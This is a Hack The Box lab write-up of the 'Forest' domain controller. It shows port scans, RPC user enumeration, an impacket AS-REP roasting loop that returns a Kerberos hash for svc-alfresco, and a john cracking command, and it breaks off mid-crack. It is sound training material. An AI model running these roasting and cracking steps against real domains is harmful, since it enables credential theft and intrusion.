I"nÃ<p>![[Pasted image 20210903122049.png]]</p>

<p>I‚Äôm pretty new to doing Hack The Box, so Forest is one the boxes that I rooted as part of the Take It Easy Dare, which taught me a good amount about approaching Active Directory machines. Forest is a domain controller with two domains, although that part isn‚Äôt as relevant. I‚Äôll begin by enumerating common ports, and find users from RPC. One of the users I find is AS-REP roastable, which will allow me to get user. From there, I‚Äôll create a user with DCSync Rights so I can dump the system hashes, and pass the hash my way to domain admin.</p>

<h2 id="recon">Recon</h2>
<p>I always like to start my AD/Windows enumeration with nmap and enum4linux.</p>

<p><strong>Nmap</strong> shows us a lot of typical Windows ports open:</p>
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span>rustscan <span class="nt">--ulimit</span> 5000 10.10.10.161 <span class="nt">--</span> <span class="nt">-Pn</span> <span class="nt">-A</span> scans/initscan.txt

PORT      STATE SERVICE      REASON  VERSION
53/tcp    open  domain       syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec syn-ack Microsoft Windows Kerberos <span class="o">(</span>server <span class="nb">time</span>: 2021-09-03 19:11:49Z<span class="o">)</span>
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: htb.local, Site: Default-First-Site-Name<span class="o">)</span>
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds <span class="o">(</span>workgroup: HTB<span class="o">)</span>
464/tcp   open  kpasswd5?    syn-ack
593/tcp   open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack .NET Message Framing
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack Microsoft Windows RPC
49706/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: FOREST<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h45m05s, deviation: 4h02m30s, median: 25m05s
| p2p-conficker: 
|   Checking <span class="k">for </span>Conficker.C or higher...
|   Check 1 <span class="o">(</span>port 34743/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Couldn<span class="s1">'t connect)
|   Check 2 (port 32753/tcp): CLEAN (Couldn'</span>t connect<span class="o">)</span>
|   Check 3 <span class="o">(</span>port 51905/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span>
|   Check 4 <span class="o">(</span>port 44587/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Failed to receive data<span class="o">)</span>
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 <span class="o">(</span>Windows Server 2016 Standard 6.3<span class="o">)</span>
|   Computer name: FOREST
|   NetBIOS computer name: FOREST<span class="se">\x</span>00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System <span class="nb">time</span>: 2021-09-03T12:12:39-07:00
| smb-security-mode: 
|   account_used: &lt;blank&gt;
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   <span class="nb">date</span>: 2021-09-03T19:12:41
|_  start_date: 2021-09-03T19:07:30

NSE: Script Post-scanning.
NSE: Starting runlevel 1 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
NSE: Starting runlevel 2 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
NSE: Starting runlevel 3 <span class="o">(</span>of 3<span class="o">)</span> scan.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>67.45 seconds
</code></pre></div></div>

<p>I also like using <a href="https://github.com/cddmp/enum4linux-ng">enum4linux-ng</a> which is just a better version of the <code class="language-plaintext highlighter-rouge">enum4linux.pl</code> that comes with Kali.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span>python3 /opt/enum4linux-ng/enum4linux-ng.py 10.10.10.161 <span class="nt">-oY</span> scans/anon-enum

 <span class="o">==========================</span>
|    Target Information    |
 <span class="o">==========================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Target ........... 10.10.10.161
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Username ......... <span class="s1">''</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Random Username .. <span class="s1">'ifbbienz'</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Password ......... <span class="s1">''</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Timeout .......... 5 second<span class="o">(</span>s<span class="o">)</span>

 <span class="o">====================================</span>
|    Service Scan on 10.10.10.161    |
 <span class="o">====================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAP
<span class="o">[</span>+] LDAP is accessible on 389/tcp
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking LDAPS
<span class="o">[</span>+] LDAPS is accessible on 636/tcp
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB
<span class="o">[</span>+] SMB is accessible on 445/tcp
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Checking SMB over NetBIOS
<span class="o">[</span>+] SMB over NetBIOS is accessible on 139/tcp

 <span class="o">====================================================</span>
|    Domain Information via LDAP <span class="k">for </span>10.10.10.161    |
 <span class="o">====================================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying LDAP
<span class="o">[</span>+] Appears to be root/parent DC
<span class="o">[</span>+] Long domain name is: htb.local

 <span class="o">====================================================</span>
|    NetBIOS Names and Workgroup <span class="k">for </span>10.10.10.161    |
 <span class="o">====================================================</span>
<span class="o">[</span>-] Could not get NetBIOS names information via <span class="s1">'nmblookup'</span>: timed out

 <span class="o">=========================================</span>
|    SMB Dialect Check on 10.10.10.161    |
 <span class="o">=========================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>legacy SMBv1 on 445/tcp
<span class="o">[</span>+] Server supports dialects higher SMBv1

 <span class="o">=========================================</span>
|    RPC Session Check on 10.10.10.161    |
 <span class="o">=========================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>null session
<span class="o">[</span>+] Server allows session using username <span class="s1">''</span>, password <span class="s1">''</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Check <span class="k">for </span>random user session
<span class="o">[</span>-] Could not establish random user session: STATUS_LOGON_FAILURE

 <span class="o">===================================================</span>
|    Domain Information via RPC <span class="k">for </span>10.10.10.161    |
 <span class="o">===================================================</span>
<span class="o">[</span>+] Domain: HTB
<span class="o">[</span>+] SID: S-1-5-21-3072663084-364016917-1341370565
<span class="o">[</span>+] Host is part of a domain <span class="o">(</span>not a workgroup<span class="o">)</span>

 <span class="o">==============================================</span>
|    OS Information via RPC on 10.10.10.161    |
 <span class="o">==============================================</span>
<span class="o">[</span>-] Could not get OS info via <span class="s1">'srvinfo'</span>: STATUS_ACCESS_DENIED

 <span class="o">=====================================</span>
|    Users via RPC on 10.10.10.161    |
 <span class="o">=====================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'querydispinfo'</span>
<span class="o">[</span>+] Found 31 <span class="nb">users </span>via <span class="s1">'querydispinfo'</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">users </span>via <span class="s1">'enumdomusers'</span>
<span class="o">[</span>+] Found 31 <span class="nb">users </span>via <span class="s1">'enumdomusers'</span>
<span class="o">[</span>+] After merging user results we have 31 <span class="nb">users </span>total:
<span class="s1">'1123'</span>:
  username: <span class="nv">$331000</span><span class="nt">-VK4ADACQNUCA</span>
  name: <span class="o">(</span>null<span class="o">)</span>
  acb: <span class="s1">'0x00020015'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1124'</span>:
  username: SM_2c8eef0a09b545acb
  name: Microsoft Exchange Approval Assistant
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1125'</span>:
  username: SM_ca8c2ed5bdab4dc9b
  name: Microsoft Exchange
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1126'</span>:
  username: SM_75a538d3025e4db9a
  name: Microsoft Exchange
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1127'</span>:
  username: SM_681f53d4942840e18
  name: Discovery Search Mailbox
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1128'</span>:
  username: SM_1b41c9286325456bb
  name: Microsoft Exchange Migration
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1129'</span>:
  username: SM_9b69f1b9d2cc45549
  name: Microsoft Exchange Federation Mailbox
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1130'</span>:
  username: SM_7c96b981967141ebb
  name: E4E Encryption Store - Active
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1131'</span>:
  username: SM_c75ee099d0a64c91b
  name: Microsoft Exchange
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1132'</span>:
  username: SM_1ffab36a2f5f479cb
  name: SystemMailbox<span class="o">{</span>8cc370d3-822a-4ab8-a926-bb94bd0641a9<span class="o">}</span>
  acb: <span class="s1">'0x00020011'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1134'</span>:
  username: HealthMailboxc3d7722
  name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1135'</span>:
  username: HealthMailboxfc9daad
  name: HealthMailbox-EXCH01-001
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1136'</span>:
  username: HealthMailboxc0a90c9
  name: HealthMailbox-EXCH01-002
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1137'</span>:
  username: HealthMailbox670628e
  name: HealthMailbox-EXCH01-003
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1138'</span>:
  username: HealthMailbox968e74d
  name: HealthMailbox-EXCH01-004
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1139'</span>:
  username: HealthMailbox6ded678
  name: HealthMailbox-EXCH01-005
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1140'</span>:
  username: HealthMailbox83d6781
  name: HealthMailbox-EXCH01-006
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1141'</span>:
  username: HealthMailboxfd87238
  name: HealthMailbox-EXCH01-007
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1142'</span>:
  username: HealthMailboxb01ac64
  name: HealthMailbox-EXCH01-008
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1143'</span>:
  username: HealthMailbox7108a4e
  name: HealthMailbox-EXCH01-009
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1144'</span>:
  username: HealthMailbox0659cc1
  name: HealthMailbox-EXCH01-010
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1145'</span>:
  username: sebastien
  name: Sebastien Caron
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1146'</span>:
  username: lucinda
  name: Lucinda Berger
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1147'</span>:
  username: svc-alfresco
  name: svc-alfresco
  acb: <span class="s1">'0x00010210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1150'</span>:
  username: andy
  name: Andy Hislip
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1151'</span>:
  username: mark
  name: Mark Brandt
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'1152'</span>:
  username: santi
  name: Santi Rodriguez
  acb: <span class="s1">'0x00000210'</span>
  description: <span class="o">(</span>null<span class="o">)</span>
<span class="s1">'500'</span>:
  username: Administrator
  name: Administrator
  acb: <span class="s1">'0x00000010'</span>
  description: Built-in account <span class="k">for </span>administering the computer/domain
<span class="s1">'501'</span>:
  username: Guest
  name: <span class="o">(</span>null<span class="o">)</span>
  acb: <span class="s1">'0x00000215'</span>
  description: Built-in account <span class="k">for </span>guest access to the computer/domain
<span class="s1">'502'</span>:
  username: krbtgt
  name: <span class="o">(</span>null<span class="o">)</span>
  acb: <span class="s1">'0x00000011'</span>
  description: Key Distribution Center Service Account
<span class="s1">'503'</span>:
  username: DefaultAccount
  name: <span class="o">(</span>null<span class="o">)</span>
  acb: <span class="s1">'0x00000215'</span>
  description: A user account managed by the system.

 <span class="o">======================================</span>
|    Groups via RPC on 10.10.10.161    |
 <span class="o">======================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">local groups</span>
<span class="o">[</span>+] Found 5 <span class="nb">groups </span>via <span class="s1">'enumalsgroups domain'</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">builtin groups</span>
<span class="o">[</span>+] Found 29 <span class="nb">groups </span>via <span class="s1">'enumalsgroups builtin'</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating domain <span class="nb">groups</span>
<span class="o">[</span>+] Found 38 <span class="nb">groups </span>via <span class="s1">'enumdomgroups'</span>
<span class="o">[</span>+] After merging <span class="nb">groups </span>results we have 72 <span class="nb">groups </span>total:
<span class="s1">'1101'</span>:
  groupname: DnsAdmins
  <span class="nb">type</span>: <span class="nb">local</span>
<span class="s1">'1102'</span>:
  groupname: DnsUpdateProxy
  <span class="nb">type</span>: domain
<span class="s1">'1104'</span>:
  groupname: Organization Management
  <span class="nb">type</span>: domain
<span class="s1">'1105'</span>:
  groupname: Recipient Management
  <span class="nb">type</span>: domain
<span class="s1">'1106'</span>:
  groupname: View-Only Organization Management
  <span class="nb">type</span>: domain
<span class="s1">'1107'</span>:
  groupname: Public Folder Management
  <span class="nb">type</span>: domain
<span class="s1">'1108'</span>:
  groupname: UM Management
  <span class="nb">type</span>: domain
<span class="s1">'1109'</span>:
  groupname: Help Desk
  <span class="nb">type</span>: domain
<span class="s1">'1110'</span>:
  groupname: Records Management
  <span class="nb">type</span>: domain
<span class="s1">'1111'</span>:
  groupname: Discovery Management
  <span class="nb">type</span>: domain
<span class="s1">'1112'</span>:
  groupname: Server Management
  <span class="nb">type</span>: domain
<span class="s1">'1113'</span>:
  groupname: Delegated Setup
  <span class="nb">type</span>: domain
<span class="s1">'1114'</span>:
  groupname: Hygiene Management
  <span class="nb">type</span>: domain
<span class="s1">'1115'</span>:
  groupname: Compliance Management
  <span class="nb">type</span>: domain
<span class="s1">'1116'</span>:
  groupname: Security Reader
  <span class="nb">type</span>: domain
<span class="s1">'1117'</span>:
  groupname: Security Administrator
  <span class="nb">type</span>: domain
<span class="s1">'1118'</span>:
  groupname: Exchange Servers
  <span class="nb">type</span>: domain
<span class="s1">'1119'</span>:
  groupname: Exchange Trusted Subsystem
  <span class="nb">type</span>: domain
<span class="s1">'1120'</span>:
  groupname: Managed Availability Servers
  <span class="nb">type</span>: domain
<span class="s1">'1121'</span>:
  groupname: Exchange Windows Permissions
  <span class="nb">type</span>: domain
<span class="s1">'1122'</span>:
  groupname: ExchangeLegacyInterop
  <span class="nb">type</span>: domain
<span class="s1">'1133'</span>:
  groupname: <span class="nv">$D31000</span><span class="nt">-NSEL5BRJ63V7</span>
  <span class="nb">type</span>: domain
<span class="s1">'1148'</span>:
  groupname: Service Accounts
  <span class="nb">type</span>: domain
<span class="s1">'1149'</span>:
  groupname: Privileged IT Accounts
  <span class="nb">type</span>: domain
<span class="s1">'498'</span>:
  groupname: Enterprise Read-only Domain Controllers
  <span class="nb">type</span>: domain
<span class="s1">'5101'</span>:
  groupname: <span class="nb">test
  type</span>: domain
<span class="s1">'512'</span>:
  groupname: Domain Admins
  <span class="nb">type</span>: domain
<span class="s1">'513'</span>:
  groupname: Domain Users
  <span class="nb">type</span>: domain
<span class="s1">'514'</span>:
  groupname: Domain Guests
  <span class="nb">type</span>: domain
<span class="s1">'515'</span>:
  groupname: Domain Computers
  <span class="nb">type</span>: domain
<span class="s1">'516'</span>:
  groupname: Domain Controllers
  <span class="nb">type</span>: domain
<span class="s1">'517'</span>:
  groupname: Cert Publishers
  <span class="nb">type</span>: <span class="nb">local</span>
<span class="s1">'518'</span>:
  groupname: Schema Admins
  <span class="nb">type</span>: domain
<span class="s1">'519'</span>:
  groupname: Enterprise Admins
  <span class="nb">type</span>: domain
<span class="s1">'520'</span>:
  groupname: Group Policy Creator Owners
  <span class="nb">type</span>: domain
<span class="s1">'521'</span>:
  groupname: Read-only Domain Controllers
  <span class="nb">type</span>: domain
<span class="s1">'522'</span>:
  groupname: Cloneable Domain Controllers
  <span class="nb">type</span>: domain
<span class="s1">'525'</span>:
  groupname: Protected Users
  <span class="nb">type</span>: domain
<span class="s1">'526'</span>:
  groupname: Key Admins
  <span class="nb">type</span>: domain
<span class="s1">'527'</span>:
  groupname: Enterprise Key Admins
  <span class="nb">type</span>: domain
<span class="s1">'544'</span>:
  groupname: Administrators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'545'</span>:
  groupname: Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'546'</span>:
  groupname: Guests
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'548'</span>:
  groupname: Account Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'549'</span>:
  groupname: Server Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'550'</span>:
  groupname: Print Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'551'</span>:
  groupname: Backup Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'552'</span>:
  groupname: Replicator
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'553'</span>:
  groupname: RAS and IAS Servers
  <span class="nb">type</span>: <span class="nb">local</span>
<span class="s1">'554'</span>:
  groupname: Pre-Windows 2000 Compatible Access
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'555'</span>:
  groupname: Remote Desktop Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'556'</span>:
  groupname: Network Configuration Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'557'</span>:
  groupname: Incoming Forest Trust Builders
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'558'</span>:
  groupname: Performance Monitor Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'559'</span>:
  groupname: Performance Log Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'560'</span>:
  groupname: Windows Authorization Access Group
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'561'</span>:
  groupname: Terminal Server License Servers
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'562'</span>:
  groupname: Distributed COM Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'568'</span>:
  groupname: IIS_IUSRS
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'569'</span>:
  groupname: Cryptographic Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'571'</span>:
  groupname: Allowed RODC Password Replication Group
  <span class="nb">type</span>: <span class="nb">local</span>
<span class="s1">'572'</span>:
  groupname: Denied RODC Password Replication Group
  <span class="nb">type</span>: <span class="nb">local</span>
<span class="s1">'573'</span>:
  groupname: Event Log Readers
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'574'</span>:
  groupname: Certificate Service DCOM Access
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'575'</span>:
  groupname: RDS Remote Access Servers
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'576'</span>:
  groupname: RDS Endpoint Servers
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'577'</span>:
  groupname: RDS Management Servers
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'578'</span>:
  groupname: Hyper-V Administrators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'579'</span>:
  groupname: Access Control Assistance Operators
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'580'</span>:
  groupname: Remote Management Users
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'581'</span>:
  groupname: System Managed Accounts Group
  <span class="nb">type</span>: <span class="nb">builtin</span>
<span class="s1">'582'</span>:
  groupname: Storage Replica Administrators
  <span class="nb">type</span>: <span class="nb">builtin</span>

 <span class="o">======================================</span>
|    Shares via RPC on 10.10.10.161    |
 <span class="o">======================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating shares
<span class="o">[</span>+] Found 0 share<span class="o">(</span>s<span class="o">)</span> <span class="k">for </span>user <span class="s1">''</span> with password <span class="s1">''</span>, try a different user

 <span class="o">=========================================</span>
|    Policies via RPC <span class="k">for </span>10.10.10.161    |
 <span class="o">=========================================</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying port 445/tcp
<span class="o">[</span>+] Found policy:
domain_password_information:
  pw_history_length: 24
  min_pw_length: 7
  min_pw_age: 1 day 4 minutes
  max_pw_age: not <span class="nb">set
  </span>pw_properties:
  - DOMAIN_PASSWORD_COMPLEX: <span class="nb">false</span>
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: <span class="nb">false</span>
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: <span class="nb">false</span>
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: <span class="nb">false</span>
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: <span class="nb">false</span>
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: <span class="nb">false
</span>domain_lockout_information:
  lockout_observation_window: 30 minutes
  lockout_duration: 30 minutes
  lockout_threshold: None
domain_logoff_information:
  force_logoff_time: not <span class="nb">set</span>

 <span class="o">=========================================</span>
|    Printers via RPC <span class="k">for </span>10.10.10.161    |
 <span class="o">=========================================</span>
<span class="o">[</span>-] Could not get printer info via <span class="s1">'enumprinters'</span>: STATUS_ACCESS_DENIED
</code></pre></div></div>

<p>From this we gain the following information:</p>
<ul>
  <li>This is an Active Directory DC as evidenced by the presence of ports like 88 (Kerberos)</li>
  <li>Domain is <code class="language-plaintext highlighter-rouge">htb.local</code></li>
  <li>We could get an Evil-WinRM shell due to the presence of port 5985</li>
</ul>

<p>But more importantly‚Ä¶</p>
<ul>
  <li>We have a list of users and groups from enumerating RPC using <code class="language-plaintext highlighter-rouge">enum4linux-ng</code></li>
</ul>

<p>There are a bunch of random program users that aren‚Äôt likely to be the avenue to foothold, so I‚Äôm just going to add the users and service accounts that seem reasonsable to add to a users list.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span><span class="nb">cat </span>users.txt
Administrator
sebastien
lucinda
andy
mark
santi
svc-alfresco
</code></pre></div></div>

<p>I‚Äôm going to add <code class="language-plaintext highlighter-rouge">htb.local</code> to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file to make it easier for myself when typing out commands. I know <code class="language-plaintext highlighter-rouge">smbclient</code> won‚Äôt really work without credentials because of the enum4linux output, so I think I‚Äôll start by AS-REP roasting the users I got since I don‚Äôt really have any other leads.</p>

<p>AS-REP roasting exploits a permission known as <code class="language-plaintext highlighter-rouge">UF_DONT_REQUIRE_PREAUTH</code>, where, if set to true, a user doesn‚Äôt need to preauthenticate with Kerberos to get their ticket. We can abuse this to grab the Ticket Granting Ticket that a user would use to authenticate to Kerberos without needing their password.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span><span class="nb">cat </span>users.txt | <span class="k">while </span><span class="nb">read </span>line<span class="p">;</span> <span class="k">do </span>python3 /opt/impacket/examples/GetNPUsers.py <span class="nt">-dc-ip</span> 10.10.10.161 htb.local/<span class="nv">$line</span> <span class="nt">-no-pass</span><span class="p">;</span> <span class="k">done</span>

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>Administrator
<span class="o">[</span>-] User Administrator doesn<span class="s1">'t have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn'</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set
</span>Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>lucinda
<span class="o">[</span>-] User lucinda doesn<span class="s1">'t have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for andy
[-] User andy doesn'</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set
</span>Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>mark
<span class="o">[</span>-] User mark doesn<span class="s1">'t have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for santi
[-] User santi doesn'</span>t have UF_DONT_REQUIRE_PREAUTH <span class="nb">set
</span>Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>svc-alfresco
<span class="nv">$krb5asrep$23$svc</span><span class="nt">-alfresco</span>@HTB.LOCAL:232e198e9fe165f5d2a0181994a1e6e4<span class="nv">$fb53384df136dcc5aab6aad6f8b947f9647fd5a06aa5dc316c75f9b229ae72b96b146d3018604cb6c81bc55695c2f181bc9ce2e561faa207d206035b79794f0e53942996b43a272f7f9baec02d08c1cf791fd7a0bd79afd08baba81f2d9bc7364e9ff590e34cf4822b4fcceb4b97efcfdd01830b553238419a3e2c4b1bba111d7f0a316c80e3566c3531b357111ecaa4da74d432c12b4aa27699b78dea78ee5b416266ddde8c3319145afef0fd934520c35bb30e3fec8663378f3093574642eddb4b9118a33437af434f0c57329ae9246e1de74216584788610d1f614840047f00eb30853c93</span>
</code></pre></div></div>

<h2 id="user">User</h2>

<p>If <code class="language-plaintext highlighter-rouge">svc-alfresco</code> has a weak password, we can crack the ticket and possibly get shell:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kali@kali:~/ctf/htb/forest<span class="nv">$ </span><span class="nb">sudo </span>john svc-alfresco <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>krb5asrep, Kerberos 5 AS-REP etype 17/18/23 <span class="o">[</span>MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]<span class="o">)</span>
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
